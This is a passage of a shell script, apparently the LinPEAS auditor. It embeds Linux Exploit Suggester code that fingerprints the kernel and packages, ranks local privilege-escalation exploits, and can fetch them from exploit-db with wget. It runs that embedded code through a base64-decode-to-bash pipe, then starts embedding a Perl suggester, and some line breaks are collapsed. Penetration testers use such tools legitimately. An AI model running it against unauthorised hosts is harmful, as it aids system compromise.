            PKG_LIST=$(cat "$pkglist_file" | awk '{print $2"-"$3}' | sed 's/:amd64//g')

            OS="debian"
            [ "$(grep ubuntu "$pkglist_file")" ] && OS="ubuntu"
        # redhat package listing file
        elif [ "$(grep -E '\.el[1-9]+[\._]' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="RHEL"
        # fedora package listing file
        elif [ "$(grep -E '\.fc[1-9]+'i "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="fedora"
        # mageia package listing file
        elif [ "$(grep -E '\.mga[1-9]+' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file")
            OS="mageia"
        # pacman package listing file
        elif [ "$(grep -E '\ [0-9]+\.' "$pkglist_file" | head -1)" ]; then
            PKG_LIST=$(cat "$pkglist_file" | awk '{print $1"-"$2}')
            OS="arch"
        # file not recognized - skipping
        else
            PKG_LIST=""
        fi

    elif [ "$distro" = "debian" -o "$distro" = "ubuntu" -o "$distro" = "deepin" ]; then
        PKG_LIST=$(dpkg -l | awk '{print $2"-"$3}' | sed 's/:amd64//g')
    elif [ "$distro" = "RHEL" -o "$distro" = "fedora" -o "$distro" = "mageia" ]; then
        PKG_LIST=$(rpm -qa)
    elif [ "$distro" = "arch" -o "$distro" = "manjaro" ]; then
        PKG_LIST=$(pacman -Q | awk '{print $1"-"$2}')
    elif [ -x /usr/bin/equery ]; then
        PKG_LIST=$(/usr/bin/equery --quiet list '*' -F '$name:$version' | cut -d/ -f2- | awk '{print $1":"$2}')
    else
        # packages listing not available
        PKG_LIST=""
    fi
}

# from: https://stackoverflow.com/questions/4023830/how-compare-two-strings-in-dot-separated-version-format-in-bash
verComparision() {

    if [[ $1 == $2 ]]
    then
        return 0
    fi

    local IFS=.
    local i ver1=($1) ver2=($2)

    # fill empty fields in ver1 with zeros
    for ((i=${#ver1[@]}; i<${#ver2[@]}; i++))
    do
        ver1[i]=0
    done

    for ((i=0; i<${#ver1[@]}; i++))
    do
        if [[ -z ${ver2[i]} ]]
        then
            # fill empty fields in ver2 with zeros
            ver2[i]=0
        fi
        if ((10#${ver1[i]} > 10#${ver2[i]}))
        then
            return 1
        fi
        if ((10#${ver1[i]} < 10#${ver2[i]}))
        then
            return 2
        fi
    done

    return 0
}

doVersionComparision() {
    local reqVersion="$1"
    local reqRelation="$2"
    local currentVersion="$3"

    verComparision $currentVersion $reqVersion
    case $? in
        0) currentRelation='=';;
        1) currentRelation='>';;
        2) currentRelation='<';;
    esac

    if [ "$reqRelation" == "=" ]; then
        [ $currentRelation == "=" ] && return 0
    elif [ "$reqRelation" == ">" ]; then
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<" ]; then
        [ $currentRelation == "<" ] && return 0
    elif [ "$reqRelation" == ">=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == ">" ] && return 0
    elif [ "$reqRelation" == "<=" ]; then
        [ $currentRelation == "=" ] && return 0
        [ $currentRelation == "<" ] && return 0
    fi
}

compareValues() {
    curVal=$1
    val=$2
    sign=$3

    if [ "$sign" == "==" ]; then
        [ "$val" == "$curVal" ] && return 0
    elif [ "$sign" == "!=" ]; then
        [ "$val" != "$curVal" ] && return 0
    fi

    return 1
}

checkRequirement() {
    #echo "Checking requirement: $1"
    local IN="$1"
    local pkgName="${2:4}"

    if [[ "$IN" =~ ^pkg=.*$ ]]; then

        # always true for Linux OS
        [ ${pkgName} == "linux-kernel" ] && return 0

        # verify if package is present 
        pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)
        if [ -n "$pkg" ]; then
            return 0
        fi

    elif [[ "$IN" =~ ^ver.*$ ]]; then
        version="${IN//[^0-9.]/}"
        rest="${IN#ver}"
        operator=${rest%$version}

        if [ "$pkgName" == "linux-kernel" -o "$opt_checksec_mode" == "true" ]; then

            # for --cvelist-file mode skip kernel version comparision
            [ "$opt_cvelist_file" = "true" ] && return 0

            doVersionComparision $version $operator $KERNEL && return 0
        else
            # extract package version and check if requiremnt is true
            pkg=$(echo "$PKG_LIST" | grep -E -i "^$pkgName-[0-9]+" | head -1)

            # skip (if run with --skip-pkg-versions) version checking if package with given name is installed
            [ "$opt_skip_pkg_versions" = "true" -a -n "$pkg" ] && return 0

            # versioning:
            #echo "pkg: $pkg"
            pkgVersion=$(echo "$pkg" | grep -E -i -o -e '-[\.0-9\+:p]+[-\+]' | cut -d':' -f2 | sed 's/[\+-]//g' | sed 's/p[0-9]//g')
            #echo "version: $pkgVersion"
            #echo "operator: $operator"
            #echo "required version: $version"
            #echo
            doVersionComparision $version $operator $pkgVersion && return 0
        fi
    elif [[ "$IN" =~ ^x86_64$ ]] && [ "$ARCH" == "x86_64" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^x86$ ]] && [ "$ARCH" == "i386" -o "$ARCH" == "i686" -o "$ARCH" == "" ]; then
        return 0
    elif [[ "$IN" =~ ^CONFIG_.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p set) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        # if kernel config IS available:
        if [ -n "$KCONFIG" ]; then
            if $KCONFIG | grep -E -qi $IN; then
                return 0;
            # required option wasn't found, exploit is not applicable
            else
                return 1;
            fi
        # config is not available
        else
            return 0;
        fi
    elif [[ "$IN" =~ ^sysctl:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        sysctlCondition="${IN:7}"

        # extract sysctl entry, relation sign and required value
        if echo $sysctlCondition | grep -qi "!="; then
            sign="!="
        elif echo $sysctlCondition | grep -qi "=="; then
            sign="=="
        else
            exitWithErrMsg "Wrong sysctl condition. There is syntax error in your features DB. Aborting."
        fi
        val=$(echo "$sysctlCondition" | awk -F "$sign" '{print $2}')
        entry=$(echo "$sysctlCondition" | awk -F "$sign" '{print $1}')

        # get current setting of sysctl entry
        curVal=$(/sbin/sysctl -a 2> /dev/null | grep "$entry" | awk -F'=' '{print $2}')

        # special case for --checksec mode: return 2 if there is no such switch in sysctl
        [ -z "$curVal" -a "$opt_checksec_mode" = "true" ] && return 2

        # for other modes: skip if there is no such switch in sysctl
        [ -z "$curVal" ] && return 0

        # compare & return result
        compareValues $curVal $val $sign && return 0

    elif [[ "$IN" =~ ^cmd:.*$ ]]; then

        # skip if check is not applicable (-k or --uname or -p modes) or if user said so (--skip-more-checks)
        [ "$opt_skip_more_checks" = "true" ] && return 0

        cmd="${IN:4}"
        if eval "${cmd}"; then
            return 0
        fi
    fi

    return 1
}

getKernelConfig() {

    if [ -f /proc/config.gz ] ; then
        KCONFIG="zcat /proc/config.gz"
    elif [ -f /boot/config-`uname -r` ] ; then
        KCONFIG="cat /boot/config-`uname -r`"
    elif [ -f "${KBUILD_OUTPUT:-/usr/src/linux}"/.config ] ; then
        KCONFIG="cat ${KBUILD_OUTPUT:-/usr/src/linux}/.config"
    else
        KCONFIG=""
    fi
}

checksecMode() {

    MODE=0

    # start analysis
for FEATURE in "${FEATURES[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$FEATURE"

	# modes: kernel-feature (1) | hw-feature (2) | 3rdparty-feature (3) | attack-surface (4)
    NAME="${arr[0]}"
    PRE_NAME="${NAME:0:8}"
    NAME="${NAME:9}"
    if [ "${PRE_NAME}" = "section:" ]; then
		# advance to next MODE
		MODE=$(($MODE + 1))

        echo
        echo -e "${bldwht}${NAME}${txtrst}"
        echo
        continue
    fi

    AVAILABLE="${arr[1]}" && AVAILABLE="${AVAILABLE:11}"
    ENABLE=$(echo "$FEATURE" | grep "enabled: " | awk -F'ed: ' '{print $2}')
    analysis_url=$(echo "$FEATURE" | grep "analysis-url: " | awk '{print $2}')

    # split line with availability requirements & loop thru all availability reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$AVAILABLE"
    AVAILABLE_REQS_NUM=${#array[@]}
    AVAILABLE_PASSED_REQ=0
	CONFIG=""
    for REQ in "${array[@]}"; do

		# find CONFIG_ name (if present) for current feature (only for display purposes)
		if [ -z "$CONFIG" ]; then
			config=$(echo "$REQ" | grep "CONFIG_")
			[ -n "$config" ] && CONFIG="($(echo $REQ | cut -d'=' -f1))"
		fi

        if (checkRequirement "$REQ"); then
            AVAILABLE_PASSED_REQ=$(($AVAILABLE_PASSED_REQ + 1))
        else
            break
        fi
    done

    # split line with enablement requirements & loop thru all enablement reqs one by one & check whether it is met
    ENABLE_PASSED_REQ=0
    ENABLE_REQS_NUM=0
    noSysctl=0
    if [ -n "$ENABLE" ]; then
        IFS=',' read -r -a array <<< "$ENABLE"
        ENABLE_REQS_NUM=${#array[@]}
        for REQ in "${array[@]}"; do
            cmdStdout=$(checkRequirement "$REQ")
            retVal=$?
            if [ $retVal -eq 0 ]; then
                ENABLE_PASSED_REQ=$(($ENABLE_PASSED_REQ + 1))
            elif [ $retVal -eq 2 ]; then
            # special case: sysctl entry is not present on given system: signal it as: N/A
                noSysctl=1
                break
            else
                break
            fi
        done
    fi

    feature=$(echo "$FEATURE" | grep "feature: " | cut -d' ' -f 2-)

    if [ -n "$cmdStdout" ]; then
        if [ $cmdStdout -eq 0 ]; then
            state="[ ${txtred}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        else
            state="[ ${txtgrn}Set to $cmdStdout${txtrst} ]"
			cmdStdout=""
        fi
    else

	unknown="[ ${txtgray}Unknown${txtrst}  ]"

	# for 3rd party (3) mode display "N/A" or "Enabled"
	if [ $MODE -eq 3 ]; then
            enabled="[ ${txtgrn}Enabled${txtrst}   ]"
            disabled="[   ${txtgray}N/A${txtrst}    ]"

        # for attack-surface (4) mode display "Locked" or "Exposed"
        elif [ $MODE -eq 4 ]; then
           enabled="[ ${txtred}Exposed${txtrst}  ]"
           disabled="[ ${txtgrn}Locked${txtrst}   ]"

	# other modes" "Disabled" / "Enabled"
	else
		enabled="[ ${txtgrn}Enabled${txtrst}  ]"
		disabled="[ ${txtred}Disabled${txtrst} ]"
	fi

	if [ -z "$KCONFIG" -a "$ENABLE_REQS_NUM" = 0 ]; then
	    state=$unknown
    elif [ $AVAILABLE_PASSED_REQ -eq $AVAILABLE_REQS_NUM -a $ENABLE_PASSED_REQ -eq $ENABLE_REQS_NUM ]; then
        state=$enabled
    else
        state=$disabled
	fi

    fi

    echo -e " $state $feature ${wht}${CONFIG}${txtrst}"
    [ -n "$analysis_url" ] && echo -e "              $analysis_url"
    echo

done

}

displayExposure() {
    RANK=$1

    if [ "$RANK" -ge 6 ]; then
        echo "highly probable"
    elif [ "$RANK" -ge 3 ]; then
        echo "probable"
    else
        echo "less probable"
    fi
}

# parse command line parameters
ARGS=$(getopt --options $SHORTOPTS  --longoptions $LONGOPTS -- "$@")
[ $? != 0 ] && exitWithErrMsg "Aborting."

eval set -- "$ARGS"

while true; do
    case "$1" in
        -u|--uname)
            shift
            UNAME_A="$1"
            opt_uname_string=true
            ;;
        -V|--version)
            version
            exit 0
            ;;
        -h|--help)
            usage 
            exit 0
            ;;
        -f|--full)
            opt_full=true
            ;;
        -g|--short)
            opt_summary=true
            ;;
        -b|--fetch-binaries)
            opt_fetch_bins=true
            ;;
        -s|--fetch-sources)
            opt_fetch_srcs=true
            ;;
        -k|--kernel)
            shift
            KERNEL="$1"
            opt_kernel_version=true
            ;;
        -d|--show-dos)
            opt_show_dos=true
            ;;
        -p|--pkglist-file)
            shift
            PKGLIST_FILE="$1"
            opt_pkglist_file=true
            ;;
        --cvelist-file)
            shift
            CVELIST_FILE="$1"
            opt_cvelist_file=true
            ;;
        --checksec)
            opt_checksec_mode=true
            ;;
        --kernelspace-only)
            opt_kernel_only=true
            ;;
        --userspace-only)
            opt_userspace_only=true
            ;;
        --skip-more-checks)
            opt_skip_more_checks=true
            ;;
        --skip-pkg-versions)
            opt_skip_pkg_versions=true
            ;;
        *)
            shift
            if [ "$#" != "0" ]; then
                exitWithErrMsg "Unknown option '$1'. Aborting."
            fi
            break
            ;;
    esac
    shift
done

# check Bash version (associative arrays need Bash in version 4.0+)
if ((BASH_VERSINFO[0] < 4)); then
    exitWithErrMsg "Script needs Bash in version 4.0 or newer. Aborting."
fi

# exit if both --kernel and --uname are set
[ "$opt_kernel_version" = "true" ] && [ $opt_uname_string = "true" ] && exitWithErrMsg "Switches -u|--uname and -k|--kernel are mutually exclusive. Aborting."

# exit if both --full and --short are set
[ "$opt_full" = "true" ] && [ $opt_summary = "true" ] && exitWithErrMsg "Switches -f|--full and -g|--short are mutually exclusive. Aborting."

# --cvelist-file mode is standalone mode and is not applicable when one of -k | -u | -p | --checksec switches are set
if [ "$opt_cvelist_file" = "true" ]; then
    [ ! -e "$CVELIST_FILE" ] && exitWithErrMsg "Provided CVE list file does not exists. Aborting."
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --cvelist-file are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --cvelist-file are mutually exclusive. Aborting."
fi

# --checksec mode is standalone mode and is not applicable when one of -k | -u | -p | --cvelist-file switches are set
if [ "$opt_checksec_mode" = "true" ]; then
    [ "$opt_kernel_version" = "true" ] && exitWithErrMsg "Switches -k|--kernel and --checksec are mutually exclusive. Aborting."
    [ "$opt_uname_string" = "true" ] && exitWithErrMsg "Switches -u|--uname and --checksec are mutually exclusive. Aborting."
    [ "$opt_pkglist_file" = "true" ] && exitWithErrMsg "Switches -p|--pkglist-file and --checksec are mutually exclusive. Aborting."
fi

# extract kernel version and other OS info like distro name, distro version, etc. 3 possibilities here:
# case 1: --kernel set
if [ "$opt_kernel_version" == "true" ]; then
    # TODO: add kernel version number validation
    [ -z "$KERNEL" ] && exitWithErrMsg "Unrecognized kernel version given. Aborting."
    ARCH=""
    OS=""

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 2: --uname set
elif [ "$opt_uname_string" == "true" ]; then
    [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
    parseUname "$UNAME_A"

    # do not perform additional checks on current machine
    opt_skip_more_checks=true

    # do not consider current OS
    getPkgList "" "$PKGLIST_FILE"

# case 3: --cvelist-file mode
elif [ "$opt_cvelist_file" = "true" ]; then

    # get kernel configuration in this mode
    [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

# case 4: --checksec mode
elif [ "$opt_checksec_mode" = "true" ]; then

    # this switch is not applicable in this mode
    opt_skip_more_checks=false

    # get kernel configuration in this mode
    getKernelConfig
    [ -z "$KCONFIG" ] && echo "WARNING. Kernel Config not found on the system results won't be complete."

    # launch checksec mode
    checksecMode

    exit 0

# case 5: no --uname | --kernel | --cvelist-file | --checksec set
else

    # --pkglist-file NOT provided: take all info from current machine
    # case for vanilla execution: ./linux-exploit-suggester.sh
    if [ "$opt_pkglist_file" == "false" ]; then
        UNAME_A=$(uname -a)
        [ -z "$UNAME_A" ] && exitWithErrMsg "uname string empty. Aborting."
        parseUname "$UNAME_A"

        # get kernel configuration in this mode
        [ "$opt_skip_more_checks" = "false" ] && getKernelConfig

        # extract distribution version from /etc/os-release OR /etc/lsb-release
        [ -n "$OS" -a "$opt_skip_more_checks" = "false" ] && DISTRO=$(grep -s -E '^DISTRIB_RELEASE=|^VERSION_ID=' /etc/*-release | cut -d'=' -f2 | head -1 | tr -d '"')

        # extract package listing from current OS
        getPkgList "$OS" ""

    # --pkglist-file provided: only consider userspace exploits against provided package listing
    else
        KERNEL=""
        #TODO: extract machine arch from package listing
        ARCH=""
        unset EXPLOITS
        declare -A EXPLOITS
        getPkgList "" "$PKGLIST_FILE"

        # additional checks are not applicable for this mode
        opt_skip_more_checks=true
    fi
fi

echo
echo -e "${bldwht}Available information:${txtrst}"
echo
[ -n "$KERNEL" ] && echo -e "Kernel version: ${txtgrn}$KERNEL${txtrst}" || echo -e "Kernel version: ${txtred}N/A${txtrst}"
echo "Architecture: $([ -n "$ARCH" ] && echo -e "${txtgrn}$ARCH${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo "Distribution: $([ -n "$OS" ] && echo -e "${txtgrn}$OS${txtrst}" || echo -e "${txtred}N/A${txtrst}")"
echo -e "Distribution version: $([ -n "$DISTRO" ] && echo -e "${txtgrn}$DISTRO${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

echo "Additional checks (CONFIG_*, sysctl entries, custom Bash commands): $([ "$opt_skip_more_checks" == "false" ] && echo -e "${txtgrn}performed${txtrst}" || echo -e "${txtred}N/A${txtrst}")"

if [ -n "$PKGLIST_FILE" -a -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}$PKGLIST_FILE${txtrst}"
elif [ -n "$PKGLIST_FILE" ]; then
    pkgListFile="${txtred}unrecognized file provided${txtrst}"
elif [ -n "$PKG_LIST" ]; then
    pkgListFile="${txtgrn}from current OS${txtrst}"
fi

echo -e "Package listing: $([ -n "$pkgListFile" ] && echo -e "$pkgListFile" || echo -e "${txtred}N/A${txtrst}")"

# handle --kernelspacy-only & --userspace-only filter options
if [ "$opt_kernel_only" = "true" -o -z "$PKG_LIST" ]; then
    unset EXPLOITS_USERSPACE
    declare -A EXPLOITS_USERSPACE
fi

if [ "$opt_userspace_only" = "true" ]; then
    unset EXPLOITS
    declare -A EXPLOITS
fi

echo
echo -e "${bldwht}Searching among:${txtrst}"
echo
echo "${#EXPLOITS[@]} kernel space exploits"
echo "${#EXPLOITS_USERSPACE[@]} user space exploits"
echo

echo -e "${bldwht}Possible Exploits:${txtrst}"
echo

# start analysis
j=0
for EXP in "${EXPLOITS[@]}" "${EXPLOITS_USERSPACE[@]}"; do

    # create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && TAGS="${TAGS:6}"
    RANK="${arr[3]}" && RANK="${RANK:6}"

    # split line with requirements & loop thru all reqs one by one & check whether it is met
    IFS=',' read -r -a array <<< "$REQS"
    REQS_NUM=${#array[@]}
    PASSED_REQ=0
    for REQ in "${array[@]}"; do
        if (checkRequirement "$REQ" "${array[0]}"); then
            PASSED_REQ=$(($PASSED_REQ + 1))
        else
            break
        fi
    done

    # execute for exploits with all requirements met
    if [ $PASSED_REQ -eq $REQS_NUM ]; then

        # additional requirement for --cvelist-file mode: check if CVE associated with the exploit is on the CVELIST_FILE
        if [ "$opt_cvelist_file" = "true" ]; then

            # extract CVE(s) associated with given exploit (also translates ',' to '|' for easy handling multiple CVEs case - via extended regex)
            cve=$(echo "$NAME" | grep '.*\[.*\].*' | cut -d 'm' -f2 | cut -d ']' -f1 | tr -d '[' | tr "," "|")
            #echo "CVE: $cve"

            # check if it's on CVELIST_FILE list, if no move to next exploit
            [ ! $(cat "$CVELIST_FILE" | grep -E "$cve") ] && continue
        fi

        # process tags and highlight those that match current OS (only for deb|ubuntu|RHEL and if we know distro version - direct mode)
        tags=""
        if [ -n "$TAGS" -a -n "$OS" ]; then
            IFS=',' read -r -a tags_array <<< "$TAGS"
            TAGS_NUM=${#tags_array[@]}

            # bump RANK slightly (+1) if we're in '--uname' mode and there's a TAG for OS from uname string
            [ "$(echo "${tags_array[@]}" | grep "$OS")" -a "$opt_uname_string" == "true" ] && RANK=$(($RANK + 1))

            for TAG in "${tags_array[@]}"; do
                tag_distro=$(echo "$TAG" | cut -d'=' -f1)
                tag_distro_num_all=$(echo "$TAG" | cut -d'=' -f2)
                # in case of tag of form: 'ubuntu=16.04{kernel:4.4.0-21} remove kernel versioning part for comparision
                tag_distro_num="${tag_distro_num_all%{*}"

                # we're in '--uname' mode OR (for normal mode) if there is distro version match
                if [ "$opt_uname_string" == "true" -o \( "$OS" == "$tag_distro" -a "$(echo "$DISTRO" | grep -E "$tag_distro_num")" \) ]; then

                    # bump current exploit's rank by 2 for distro match (and not in '--uname' mode)
                    [ "$opt_uname_string" == "false" ] && RANK=$(($RANK + 2))

                    # get name (kernel or package name) and version of kernel/pkg if provided:
                    tag_pkg=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 1)
                    tag_pkg_num=""
                    [ $(echo "$tag_distro_num_all" | grep '{') ] && tag_pkg_num=$(echo "$tag_distro_num_all" | cut -d'{' -f 2 | tr -d '}' | cut -d':' -f 2)

                    #[ -n "$tag_pkg_num" ] && echo "tag_pkg_num: $tag_pkg_num; kernel: $KERNEL_ALL"

                    # if pkg/kernel version is not provided:
                    if [ -z "$tag_pkg_num" ]; then
                        [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ ${TAG} ]${txtrst}"

                    # kernel version provided, check for match:
                    elif [ -n "$tag_pkg_num" -a "$tag_pkg" = "kernel" ]; then
                        if [ $(echo "$KERNEL_ALL" | grep -E "${tag_pkg_num}") ]; then
                            # kernel version matched - bold highlight
                            TAG="${yellow}[ ${TAG} ]${txtrst}"

                            # bump current exploit's rank additionally by 3 for kernel version regex match
                            RANK=$(($RANK + 3))
                        else
                            [ "$opt_uname_string" == "false" ] && TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{kernel:$tag_pkg_num}"
                        fi

                    # pkg version provided, check for match (TBD):
                    elif [ -n "$tag_pkg_num" -a -n "$tag_pkg"  ]; then
                        TAG="${lightyellow}[ $tag_distro=$tag_distro_num ]${txtrst}{$tag_pkg:$tag_pkg_num}"
                    fi

                fi

                # append current tag to tags list
                tags="${tags}${TAG},"
            done
            # trim ',' added by above loop
            [ -n "$tags" ] && tags="${tags%?}"
        else
            tags="$TAGS"
        fi

        # insert the matched exploit (with calculated Rank and highlighted tags) to arrary that will be sorted
        EXP=$(echo "$EXP" | sed -e '/^Name:/d' -e '/^Reqs:/d' -e '/^Tags:/d')
        exploits_to_sort[j]="${RANK}Name: ${NAME}D3L1mReqs: ${REQS}D3L1mTags: ${tags}D3L1m$(echo "$EXP" | sed -e ':a' -e 'N' -e '$!ba' -e 's/\n/D3L1m/g')"
        ((j++))
    fi
done

# sort exploits based on calculated Rank
IFS=$'\n'
SORTED_EXPLOITS=($(sort -r <<<"${exploits_to_sort[*]}"))
unset IFS

# display sorted exploits
for EXP_TEMP in "${SORTED_EXPLOITS[@]}"; do

	RANK=$(echo "$EXP_TEMP" | awk -F'Name:' '{print $1}')

	# convert entry back to canonical form
	EXP=$(echo "$EXP_TEMP" | sed 's/^[0-9]//g' | sed 's/D3L1m/\n/g')

	# create array from current exploit here doc and fetch needed lines
    i=0
    # ('-r' is used to not interpret backslash used for bash colors)
    while read -r line
    do
        arr[i]="$line"
        i=$((i + 1))
    done <<< "$EXP"

    NAME="${arr[0]}" && NAME="${NAME:6}"
    REQS="${arr[1]}" && REQS="${REQS:6}"
    TAGS="${arr[2]}" && tags="${TAGS:6}"

	EXPLOIT_DB=$(echo "$EXP" | grep "exploit-db: " | awk '{print $2}')
	analysis_url=$(echo "$EXP" | grep "analysis-url: " | awk '{print $2}')
	ext_url=$(echo "$EXP" | grep "ext-url: " | awk '{print $2}')
	comments=$(echo "$EXP" | grep "Comments: " | cut -d' ' -f 2-)
	reqs=$(echo "$EXP" | grep "Reqs: " | cut -d' ' -f 2)

	# exploit name without CVE number and without commonly used special chars
	name=$(echo "$NAME" | cut -d' ' -f 2- | tr -d ' ()/')

	bin_url=$(echo "$EXP" | grep "bin-url: " | awk '{print $2}')
	src_url=$(echo "$EXP" | grep "src-url: " | awk '{print $2}')
	[ -z "$src_url" ] && [ -n "$EXPLOIT_DB" ] && src_url="https://www.exploit-db.com/download/$EXPLOIT_DB"
	[ -z "$src_url" ] && [ -z "$bin_url" ] && exitWithErrMsg "'src-url' / 'bin-url' / 'exploit-db' entries are all empty for '$NAME' exploit - fix that. Aborting."

	if [ -n "$analysis_url" ]; then
        details="$analysis_url"
	elif $(echo "$src_url" | grep -q 'www.exploit-db.com'); then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	elif [[ "$src_url" =~ ^.*tgz|tar.gz|zip$ && -n "$EXPLOIT_DB" ]]; then
        details="https://www.exploit-db.com/exploits/$EXPLOIT_DB/"
	else
        details="$src_url"
	fi

	# skip DoS by default
	dos=$(echo "$EXP" | grep -o -i "(dos")
	[ "$opt_show_dos" == "false" ] && [ -n "$dos" ] && continue

	# handles --fetch-binaries option
	if [ $opt_fetch_bins = "true" ]; then
        for i in $(echo "$EXP" | grep "bin-url: " | awk '{print $2}'); do
            [ -f "${name}_$(basename $i)" ] && rm -f "${name}_$(basename $i)"
            wget -q -k "$i" -O "${name}_$(basename $i)"
        done
    fi

	# handles --fetch-sources option
	if [ $opt_fetch_srcs = "true" ]; then
        [ -f "${name}_$(basename $src_url)" ] && rm -f "${name}_$(basename $src_url)"
        wget -q -k "$src_url" -O "${name}_$(basename $src_url)" &
    fi

    # display result (short)
	if [ "$opt_summary" = "true" ]; then
	[ -z "$tags" ] && tags="-"
	echo -e "$NAME || $tags || $src_url"
	continue
	fi

# display result (standard)
	echo -e "[+] $NAME"
	echo -e "\n   Details: $details"
        echo -e "   Exposure: $(displayExposure $RANK)"
        [ -n "$tags" ] && echo -e "   Tags: $tags"
        echo -e "   Download URL: $src_url"
        [ -n "$ext_url" ] && echo -e "   ext-url: $ext_url"
        [ -n "$comments" ] && echo -e "   Comments: $comments"

        # handles --full filter option
        if [ "$opt_full" = "true" ]; then
            [ -n "$reqs" ] && echo -e "   Requirements: $reqs"

            [ -n "$EXPLOIT_DB" ] && echo -e "   exploit-db: $EXPLOIT_DB"

            author=$(echo "$EXP" | grep "author: " | cut -d' ' -f 2-)
            [ -n "$author" ] && echo -e "   author: $author"
        fi

        echo

done
"
echo $les_b64 | base64 -d | bash | sed "s,$(printf '\033')\\[[0-9;]*[a-zA-Z],,g"
| grep -i "\[CVE" -A 10 | grep -Ev "^\-\-$" | sed -${E}
"s,\[CVE-[0-9]+-[0-9]+\].*,${SED_RED},g" echo "" fi if [ "$(command -v perl
2>/dev/null)" ]; then print_2title "Executing Linux Exploit Suggester 2"
print_info "https://github.com/jondonas/linux-exploit-suggester-2"
les2_b64="#!/usr/bin/perl
use strict;
use warnings;
use Getopt::Std;

our $VERSION = '2';

my %opts;
getopts( 'k:hd', \%opts );
if (exists $opts{h}) {
    usage();
    exit;
};

print_banner();
my ( $khost, $is_partial ) = get_kernel();
print "  Local Kernel: \e[00;33m$khost\e[00m\n";

my %exploits = get_exploits();
print '  Searching ' . scalar keys(%exploits) . " exploits...\n\n";
print "  \e[1;35mPossible Exploits\e[00m\n";

my $count = 1;
my @applicable = ();
EXPLOIT:
foreach my $key ( sort keys %exploits ) {
    foreach my $kernel ( @{ $exploits{$key}{vuln} } ) {

        if (     $khost eq $kernel
              or ( $is_partial and index($kernel,$khost) == 0 )
        ) {
            $exploits{$key}{key} = $key;
            push(@applicable, $exploits{$key});
            print "  \e[00;33m[\e[00m\e[00;31m$count\e[00m\e[00;33m]\e[00m ";
            print "\e[00;33m$key\e[00m";
            print " \e[00;33m($kernel)\e[00m" if $is_partial;

            my $alt = $exploits{$key}{alt};
            my $cve = $exploits{$key}{cve};
            my $mlw = $exploits{$key}{mil};
            if ( $alt or $cve ) {
                print "\n";
            }
            if ( $alt ) { print "      Alt: $alt "; }
            if ( $cve ) { print "      CVE-$cve"; }
            if ( $mlw ) { print "\n      Source: $mlw"; }
            print "\n";
            $count += 1;
            next EXPLOIT;
        }
    }
}
print "\n";

if (!@applicable) {
    print "  No exploits are available for this kernel version\n\n";
    exit;
}

if (exists $opts{d}) {
    print "  \e[1;36mExploit Download\e[00m\n";
    print "  (Download all: \e[00;33m'a'\e[00m / Individually: \e[00;33m'2,4,5'\e[00m ";
    print "/ Exit: \e[00;33m^c\e[00m)\n";
    print "  Select exploits to download: ";

    while (1) {
        my $input = <STDIN>;
        $input =~ s/\s+//g;

        if ($input =~ /^a$/) {
            my @selected = ();
            for (my $i=1; $i <= scalar @applicable; $i++) {
               push(@selected, $i);
            }
            download_exploits(\@selected, \@applicable);
            last;
        }
        elsif ($input =~ /^(0|[1-9][0-9]*)(,(0|[1-9][0-9]*))*$/) {
            my @selected = uniq(split(',', $input));
            @selected = sort {$a <=> $b} @selected;
            if ($selected[0] > 0 && $selected[-1] <= scalar @applicable) {
                download_exploits(\@selected, \@applicable);
                last;
            }
            else {
               print "  \e[00;31mInput is out of range.\e[00m Select exploits to download: ";
            }
        }
        else {
            print "  \e[00;31mInvalid input.\e[00m Select exploits to download: ";
        }
    }
};
exit;

######################
## extra functions  ##
######################

sub get_kernel {
    my $khost = '';

    if ( exists $opts{k} ) {
        $khost = $opts{k};
    }
    else {
        $khost = `uname -r |cut -d"-" -f1`;
        chomp $khost;
    }

    if (!defined $khost || !($khost =~ /^[0-9]+([.][0-9]+)*$/)) {
        print "  \e[00;31mSpecified kernel is in the wrong format\e[00m\n";
        print "  Try a kernel format like this: 3.2.0\n\n";
        exit;
    }

    # partial kernels might be provided by the user,
    # such as '2.4' or '2.6.'
    my $is_partial = $khost =~ /^\d+\.\d+\.\d?/ ? 0 : 1;
    return ( $khost, $is_partial );
}

sub download_exploits {
    my ($sref, $aref) = @_;
    my @selected = @{ $sref };
    my @applicable = @{ $aref };
